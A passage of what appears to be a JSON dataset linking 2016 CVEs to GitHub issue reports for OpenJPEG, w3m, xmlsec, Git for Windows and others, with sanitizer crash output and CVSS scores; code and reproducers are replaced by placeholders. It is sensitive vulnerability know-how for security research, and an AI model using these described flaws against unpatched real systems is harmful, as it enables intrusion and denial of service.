  3765. "description": "Heap Buffer Overflow in function imagetotga of APITAG DESCRIPTION OPENJPEG Heap Buffer Overflow in function imagetotga of APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b4a NUMBERTAG at pc NUMBERTAG b NUMBERTAG bp NUMBERTAG bfcb8de8 sp NUMBERTAG bfcb8ddc READ of size NUMBERTAG at NUMBERTAG b4a NUMBERTAG thread T NUMBERTAG b1f ( PATHTAG NUMBERTAG a ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b4a NUMBERTAG is located NUMBERTAG bytes to the left of NUMBERTAG byte region NUMBERTAG b4a NUMBERTAG b4a NUMBERTAG allocated by thread T0 here NUMBERTAG f4 ( PATHTAG NUMBERTAG b NUMBERTAG e0c ( PATHTAG NUMBERTAG b NUMBERTAG f ( PATHTAG NUMBERTAG b NUMBERTAG cb NUMBERTAG a ( PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a ( PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG faa NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow ( PATHTAG ) Shadow bytes around the buggy address NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG d0: fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG e NUMBERTAG fa fa fa[fa]fa NUMBERTAG f NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Analysis come soon Poc Contact me if you need Poc file at EMAILTAG",
  3766. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3767. "severity": "MEDIUM",
  3768. "baseScore": 6.5,
  3769. "impactScore": 3.6,
  3770. "exploitabilityScore": 2.8
  3771. },
  3772. {
  3773. "CVE_ID": "CVE-2016-9116",
  3774. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/859",
  3775. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/859",
  3776. "Repo_new": "uclouvain/openjpeg",
  3777. "Issue_Created_At": "2016-10-29T08:53:27Z",
  3778. "description": "NULL Pointer Access in function imagetopnm of APITAG . DESCRIPTION OPENJPEG null ptr dereference in APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f bp NUMBERTAG bfe NUMBERTAG sp NUMBERTAG bfe NUMBERTAG T NUMBERTAG e ( PATHTAG NUMBERTAG ce ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) GDB Information Breakpoint NUMBERTAG imagetoraw_common (image NUMBERTAG a NUMBERTAG c0, outfile NUMBERTAG bf8b NUMBERTAG APITAG big_endian NUMBERTAG at PATHTAG NUMBERTAG ptr = image APITAG (rr) p image APITAG NUMBERTAG OPJ_INT NUMBERTAG rr) n NUMBERTAG for (line NUMBERTAG line APITAG APITAG = NULL and it was assigned to ptr, so the program accesses to ptr, segment fault occurs. Poc Contact me if you need Poc file at EMAILTAG",
  3779. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3780. "severity": "MEDIUM",
  3781. "baseScore": 6.5,
  3782. "impactScore": 3.6,
  3783. "exploitabilityScore": 2.8
  3784. },
  3785. {
  3786. "CVE_ID": "CVE-2016-9117",
  3787. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/860",
  3788. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/860",
  3789. "Repo_new": "uclouvain/openjpeg",
  3790. "Issue_Created_At": "2016-10-29T09:30:52Z",
  3791. "description": "NULL Pointer Access in function imagetopnm of APITAG DESCRIPTION OPENJPEG null ptr dereference in APITAG VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG ca7 bp NUMBERTAG bfd NUMBERTAG sp NUMBERTAG bfd NUMBERTAG T NUMBERTAG ca6 ( PATHTAG NUMBERTAG f ( PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) GDB Information (rr) p image >comps NUMBERTAG d NUMBERTAG dy NUMBERTAG w NUMBERTAG h NUMBERTAG y NUMBERTAG prec NUMBERTAG bpp NUMBERTAG sgnd NUMBERTAG resno_decoded NUMBERTAG factor NUMBERTAG data NUMBERTAG alpha NUMBERTAG Poc Contact me if you need Poc file at EMAILTAG",
  3792. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3793. "severity": "MEDIUM",
  3794. "baseScore": 6.5,
  3795. "impactScore": 3.6,
  3796. "exploitabilityScore": 2.8
  3797. },
  3798. {
  3799. "CVE_ID": "CVE-2016-9118",
  3800. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/861",
  3801. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/861",
  3802. "Repo_new": "uclouvain/openjpeg",
  3803. "Issue_Created_At": "2016-10-30T03:53:07Z",
  3804. "description": "Heap Buffer Overflow in function pnmtoimage of convert.c. Description APITAG Heap Buffer Overflow in function pnmtoimage of APITAG Testing Environment Ubuntu NUMBERTAG APITAG Exception Information Address Sanitizer Output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG f4 at pc NUMBERTAG bp NUMBERTAG bffe NUMBERTAG sp NUMBERTAG bffe NUMBERTAG c WRITE of size NUMBERTAG at NUMBERTAG b NUMBERTAG f4 thread T NUMBERTAG PATHTAG NUMBERTAG b6 ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f4 is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f4) allocated by thread T0 here NUMBERTAG f4 ( PATHTAG NUMBERTAG b NUMBERTAG e0c ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG b6 ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow ( PATHTAG ) Shadow bytes around the buggy address NUMBERTAG ae NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ae NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: 
fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING GDB Information Program received signal SIGSEGV, Segmentation fault NUMBERTAG cb5 in pnmtoimage (filename NUMBERTAG bf9b1e NUMBERTAG APITAG parameters NUMBERTAG bf9b NUMBERTAG at PATHTAG NUMBERTAG image APITAG = (((uc>>bit NUMBERTAG rr) p i NUMBERTAG rr) p NUMBERTAG rr) p y NUMBERTAG rr) p image APITAG NUMBERTAG OPJ_INT NUMBERTAG e8 (rr) p h NUMBERTAG rr) p w NUMBERTAG rr) p image APITAG Cannot access memory at address NUMBERTAG Analysis ERRORTAG Poc Contact me if you need Poc file at EMAILTAG",
  3805. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  3806. "severity": "MEDIUM",
  3807. "baseScore": 5.3,
  3808. "impactScore": 1.4,
  3809. "exploitabilityScore": 3.9
  3810. },
  3811. {
  3812. "CVE_ID": "CVE-2016-9177",
  3813. "Issue_Url_old": "https://github.com/perwendel/spark/issues/700",
  3814. "Issue_Url_new": "https://github.com/perwendel/spark/issues/700",
  3815. "Repo_new": "perwendel/spark",
  3816. "Issue_Created_At": "2016-11-04T12:13:25Z",
  3817. "description": "Arbitrary File Read Vulnerability. Just posting it here so it gets visibility, I didn't write the original message: URLTAG There appears to be a vulnerability which lets users read any file from the file system",
  3818. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  3819. "severity": "HIGH",
  3820. "baseScore": 7.5,
  3821. "impactScore": 3.6,
  3822. "exploitabilityScore": 3.9
  3823. },
  3824. {
  3825. "CVE_ID": "CVE-2016-9189",
  3826. "Issue_Url_old": "https://github.com/python-pillow/Pillow/issues/2105",
  3827. "Issue_Url_new": "https://github.com/python-pillow/pillow/issues/2105",
  3828. "Repo_new": "python-pillow/pillow",
  3829. "Issue_Created_At": "2016-09-06T17:36:21Z",
  3830. "description": "Multiple memory corruption vulnerabilities. While performing a security assessment for a client, we identified a number of potential memory corruption vulnerabilities within the native extensions included with Pillow. Given that these vulnerabilities may currently represent exploitable conditions within our client's environment we, would like to report their details privately. Could a project member please limit the visibility of this issue so that it is not available to the public? Alternatively, we can provide vulnerability details via e mail if that is preferable. Thank you, Cris Neckar Divergent Security",
  3831. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  3832. "severity": "MEDIUM",
  3833. "baseScore": 5.5,
  3834. "impactScore": 3.6,
  3835. "exploitabilityScore": 1.8
  3836. },
  3837. {
  3838. "CVE_ID": "CVE-2016-9243",
  3839. "Issue_Url_old": "https://github.com/pyca/cryptography/issues/3211",
  3840. "Issue_Url_new": "https://github.com/pyca/cryptography/issues/3211",
  3841. "Repo_new": "pyca/cryptography",
  3842. "Issue_Created_At": "2016-11-01T19:47:20Z",
  3843. "description": "HKDF key length inconsistency. For too small key sizes, APITAG outputs an empty array instead of a small key: Program: CODETAG Output: APITAG Suggested fix: I am not quite sure why the division by NUMBERTAG in the snippet below was added. The cumulative size of the output array is always APITAG and thus we can stop after APITAG . At first I thought this might be a clever trick taken from the paper, but I didn't find it there. I guess there was a mixup between bits and bytes at some point. ERRORTAG",
  3844. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  3845. "severity": "HIGH",
  3846. "baseScore": 7.5,
  3847. "impactScore": 3.6,
  3848. "exploitabilityScore": 3.9
  3849. },
  3850. {
  3851. "CVE_ID": "CVE-2016-9274",
  3852. "Issue_Url_old": "https://github.com/git-for-windows/git/issues/944",
  3853. "Issue_Url_new": "https://github.com/git-for-windows/git/issues/944",
  3854. "Repo_new": "git-for-windows/git",
  3855. "Issue_Created_At": "2016-11-04T17:15:19Z",
  3856. "description": "EXE hijacking runs unexpected code when using context menus in Windows Explorer. Setup Which version of Git for Windows are you using? Is it NUMBERTAG bit or NUMBERTAG bit? FILETAG Which version of Windows are you running? Vista NUMBERTAG Is it NUMBERTAG bit or NUMBERTAG bit? Windows NUMBERTAG What options did you set as part of the installation? Or did you choose the defaults? Defaults ` One of the following: C:\\>type APITAG PATHTAG Path Option: Cmd SSH Option: APITAG CRLF Option: APITAG Bash Terminal Option: APITAG Performance Tweaks APITAG Enabled Enable Symlinks: Disabled Any other interesting things about your environment that might be related to the issue you're seeing? Don't think so. Had some buddies reproduce the issue on Windows NUMBERTAG Details Which terminal/shell are you running Git from? e.g PATHTAG Windows Explorer What commands did you run to trigger this issue? Here is an example of the steps to reproduce in Windows Explorer URLTAG What did you expect to occur after running these commands? Open Git Bash in the current folder What actually happened instead? Arbitrary file named APITAG in the current folder was executed. This has security implications since users will not expect this behavior when using Windows context menus. For example, a security conscious user would know not to execute EXE files included in an untrusted repository, but using Windows context menus could unexpectedly execute such untrusted code. This issue is similar to DLL hijacking if you are familiar with that. Here is a brief explanation of DLL hijacking if you're not familiar URLTAG",
  3857. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3858. "severity": "HIGH",
  3859. "baseScore": 7.8,
  3860. "impactScore": 5.9,
  3861. "exploitabilityScore": 1.8
  3862. },
  3863. {
  3864. "CVE_ID": "CVE-2016-9298",
  3865. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/296",
  3866. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/296",
  3867. "Repo_new": "imagemagick/imagemagick",
  3868. "Issue_Created_At": "2016-10-31T22:18:46Z",
  3869. "description": "crash. PATHTAG Overall demo of the major APITAG methods. use APITAG use aliased APITAG => 'im'; Read model & smile image. print APITAG $null=im >new; $null APITAG $x=$null APITAG warn \"$x\" if \"$x\"; $model=im APITAG $x=$model APITAG warn \"$x\" if \"$x\"; $model APITAG $model APITAG $smile=im >new; $x=$smile APITAG warn \"$x\" if \"$x\"; $smile APITAG $smile APITAG Create image stack. print APITAG APITAG $images=im APITAG print APITAG APITAG $example=$model APITAG $example APITAG Blur'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Resize'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Sharpen'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Threshold'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Noise'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Gamma'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Level'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Stretch'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG 
push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG pixel'=>'white'); push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG points NUMBERTAG strokewidth NUMBERTAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Edges'); $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG push( APITAG >Fx(expression NUMBERTAG u')); print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Blur'); $example APITAG push( APITAG print APITAG $gradient=im >new; $gradient APITAG $x=$gradient APITAG NUMBERTAG a0ff ffff NUMBERTAG warn \"$x\" if \"$x\"; $gradient APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Stretch'); $example APITAG push( APITAG print APITAG APITAG $example=$model 
APITAG $example APITAG Filter'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG $example=$model APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Blur'); $example APITAG NUMBERTAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Paint'); $example APITAG push( APITAG print APITAG $plasma=im >new; $plasma APITAG $x=$plasma APITAG warn \"$x\" if \"$x\"; $plasma APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG gravity=>'center'); push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Blur'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Noise'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( 
APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Contrast'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Mask'); $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG Create image montage. print APITAG $montage=$images APITAG APITAG ffffff', APITAG NUMBERTAG stroke=>'none', shadow=>'true'); $logo=im APITAG $logo APITAG $logo APITAG $montage APITAG print APITAG $montage APITAG $montage APITAG print APITAG $montage APITAG",
  3870. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3871. "severity": "MEDIUM",
  3872. "baseScore": 5.5,
  3873. "impactScore": 3.6,
  3874. "exploitabilityScore": 1.8
  3875. },
  3876. {
  3877. "CVE_ID": "CVE-2016-9318",
  3878. "Issue_Url_old": "https://github.com/lsh123/xmlsec/issues/43",
  3879. "Issue_Url_new": "https://github.com/lsh123/xmlsec/issues/43",
  3880. "Repo_new": "lsh123/xmlsec",
  3881. "Issue_Created_At": "2016-10-06T17:08:21Z",
  3882. "description": "xmlsec vulnerable to XXE. Description An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Whenever xmlsec verifies, encrypt, decrypt an XML document the parse by default reads external entities resulting on an XXE Vulnerability. Proof of Concept APITAG Running a fake command to test: ERRORTAG Listener: CODETAG Note: The same results were found as a result of trying to encrypt or decrypt content. Recommendations It is my recommendation that the xmlsec library by default denies External Entities and local file inclusion and/or provides a command line option that can be used to block them.",
  3883. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  3884. "severity": "MEDIUM",
  3885. "baseScore": 5.5,
  3886. "impactScore": 3.6,
  3887. "exploitabilityScore": 1.8
  3888. },
  3889. {
  3890. "CVE_ID": "CVE-2016-9422",
  3891. "Issue_Url_old": "https://github.com/tats/w3m/issues/8",
  3892. "Issue_Url_new": "https://github.com/tats/w3m/issues/8",
  3893. "Repo_new": "tats/w3m",
  3894. "Issue_Created_At": "2016-08-11T19:32:39Z",
  3895. "description": "Stack seems smashed with large image inside table. How to reproduce CODETAG The behavior is not stable. w3m sometimes crashes and sometimes doesn't. Usually It just segfault and sometimes stack protector says stack smashed. I haven't debug it, so I don't know why it's unstable and how the stack smashed. Following is my steps to compile w3m: APITAG This is found by afl fuzz.",
  3896. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3897. "severity": "HIGH",
  3898. "baseScore": 8.8,
  3899. "impactScore": 5.9,
  3900. "exploitabilityScore": 2.8
  3901. },
  3902. {
  3903. "CVE_ID": "CVE-2016-9423",
  3904. "Issue_Url_old": "https://github.com/tats/w3m/issues/9",
  3905. "Issue_Url_new": "https://github.com/tats/w3m/issues/9",
  3906. "Repo_new": "tats/w3m",
  3907. "Issue_Created_At": "2016-08-12T11:58:50Z",
  3908. "description": "malform html tag may crash w3m. How to reproduce CODETAG gdb log ERRORTAG Looks like something overflow and overwrite \"a\" pointer. This is found by afl fuzz",
  3909. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3910. "severity": "HIGH",
  3911. "baseScore": 8.8,
  3912. "impactScore": 5.9,
  3913. "exploitabilityScore": 2.8
  3914. },
  3915. {
  3916. "CVE_ID": "CVE-2016-9424",
  3917. "Issue_Url_old": "https://github.com/tats/w3m/issues/12",
  3918. "Issue_Url_new": "https://github.com/tats/w3m/issues/12",
  3919. "Repo_new": "tats/w3m",
  3920. "Issue_Created_At": "2016-08-16T17:54:10Z",
  3921. "description": "heap out of bound write due to negative array index. How to reproduce: CODETAG Here, selectnumber could be negative, or positive but overflows to negative. The corresponding code snippet: CODETAG APITAG is the selectnumber mentioned above. It will crash at line NUMBERTAG Similar code pattern at line NUMBERTAG CODETAG",
  3922. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3923. "severity": "HIGH",
  3924. "baseScore": 8.8,
  3925. "impactScore": 5.9,
  3926. "exploitabilityScore": 2.8
  3927. },
  3928. {
  3929. "CVE_ID": "CVE-2016-9425",
  3930. "Issue_Url_old": "https://github.com/tats/w3m/issues/21",
  3931. "Issue_Url_new": "https://github.com/tats/w3m/issues/21",
  3932. "Repo_new": "tats/w3m",
  3933. "Issue_Created_At": "2016-08-19T16:05:49Z",
  3934. "description": "segfault due to write to APITAG NUMBERTAG in APITAG ERRORTAG This is found by afl fuzz",
  3935. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3936. "severity": "HIGH",
  3937. "baseScore": 8.8,
  3938. "impactScore": 5.9,
  3939. "exploitabilityScore": 2.8
  3940. },
  3941. {
  3942. "CVE_ID": "CVE-2016-9426",
  3943. "Issue_Url_old": "https://github.com/tats/w3m/issues/25",
  3944. "Issue_Url_new": "https://github.com/tats/w3m/issues/25",
  3945. "Repo_new": "tats/w3m",
  3946. "Issue_Created_At": "2016-08-21T18:34:47Z",
  3947. "description": "heap corruption due to integer overflow in APITAG This bug is interesting since it triggered libgc's issue URLTAG as well. How to reproduce APITAG gdb CODETAG This demonstrate libgc's bug. n NUMBERTAG libgc treat it as ERRORTAG NUMBERTAG The allocation should be failed (either return NULL or abort the program). But it returns NUMBERTAG df NUMBERTAG If continue to run CODETAG With further investigation, w3m's negative size comes from table.c, APITAG line NUMBERTAG APITAG where APITAG NUMBERTAG but APITAG is short . After assignment, APITAG",
  3948. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3949. "severity": "HIGH",
  3950. "baseScore": 8.8,
  3951. "impactScore": 5.9,
  3952. "exploitabilityScore": 2.8
  3953. },
  3954. {
  3955. "CVE_ID": "CVE-2016-9427",
  3956. "Issue_Url_old": "https://github.com/ivmai/bdwgc/issues/135",
  3957. "Issue_Url_new": "https://github.com/ivmai/bdwgc/issues/135",
  3958. "Repo_new": "ivmai/bdwgc",
  3959. "Issue_Created_At": "2016-08-21T11:55:16Z",
  3960. "description": "integer overflow in GC_MALLOC_ATOMIC. When call APITAG the expected behavior should be out of memory obviously and return NULL. However, libgc will return a pointer. The caller thought the allocation succeeded and started to write data into heap via the said pointer and thus heap corruption. The reason is integer overflow in macro APITAG URLTAG APITAG (sz) + HBLKSIZE NUMBERTAG overflows and become a small positive number. After the overflow, libgc allocates a small block of memory and return the pointer.",
  3961. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  3962. "severity": "CRITICAL",
  3963. "baseScore": 9.8,
  3964. "impactScore": 5.9,
  3965. "exploitabilityScore": 3.9
  3966. },
  3967. {
  3968. "CVE_ID": "CVE-2016-9428",
  3969. "Issue_Url_old": "https://github.com/tats/w3m/issues/26",
  3970. "Issue_Url_new": "https://github.com/tats/w3m/issues/26",
  3971. "Repo_new": "tats/w3m",
  3972. "Issue_Created_At": "2016-08-28T15:44:14Z",
  3973. "description": "heap buffer overflow write in APITAG input CODETAG ERRORTAG pr is corrupted. Note the correct address of pr is NUMBERTAG c7f NUMBERTAG but its highest byte is overwritten by NUMBERTAG b=='[' This is because buffer overflows earlier in APITAG (several times). With following assertion, it can catch the overflow easier. CODETAG ERRORTAG",
  3974. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3975. "severity": "HIGH",
  3976. "baseScore": 8.8,
  3977. "impactScore": 5.9,
  3978. "exploitabilityScore": 2.8
  3979. },
  3980. {
  3981. "CVE_ID": "CVE-2016-9429",
  3982. "Issue_Url_old": "https://github.com/tats/w3m/issues/29",
  3983. "Issue_Url_new": "https://github.com/tats/w3m/issues/29",
  3984. "Repo_new": "tats/w3m",
  3985. "Issue_Created_At": "2016-10-03T00:58:31Z",
  3986. "description": "global buffer overflow write in APITAG input CODETAG APITAG output ERRORTAG gdb output CODETAG found by afl fuzz",
  3987. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3988. "severity": "HIGH",
  3989. "baseScore": 8.8,
  3990. "impactScore": 5.9,
  3991. "exploitabilityScore": 2.8
  3992. },
  3993. {
  3994. "CVE_ID": "CVE-2016-9430",
  3995. "Issue_Url_old": "https://github.com/tats/w3m/issues/7",
  3996. "Issue_Url_new": "https://github.com/tats/w3m/issues/7",
  3997. "Repo_new": "tats/w3m",
  3998. "Issue_Created_At": "2016-08-08T08:43:17Z",
  3999. "description": "segfault for malform APITAG tag. How to reproduce APITAG CODETAG This is found by afl fuzz.",
  4000. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4001. "severity": "MEDIUM",
  4002. "baseScore": 6.5,
  4003. "impactScore": 3.6,
  4004. "exploitabilityScore": 2.8
  4005. },
  4006. {
  4007. "CVE_ID": "CVE-2016-9431",
  4008. "Issue_Url_old": "https://github.com/tats/w3m/issues/10",
  4009. "Issue_Url_new": "https://github.com/tats/w3m/issues/10",
  4010. "Repo_new": "tats/w3m",
  4011. "Issue_Created_At": "2016-08-14T13:38:48Z",
  4012. "description": "stackoverflow in APITAG on malform input. How to reproduce: CODETAG ASAN output: ERRORTAG",
  4013. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4014. "severity": "MEDIUM",
  4015. "baseScore": 6.5,
  4016. "impactScore": 3.6,
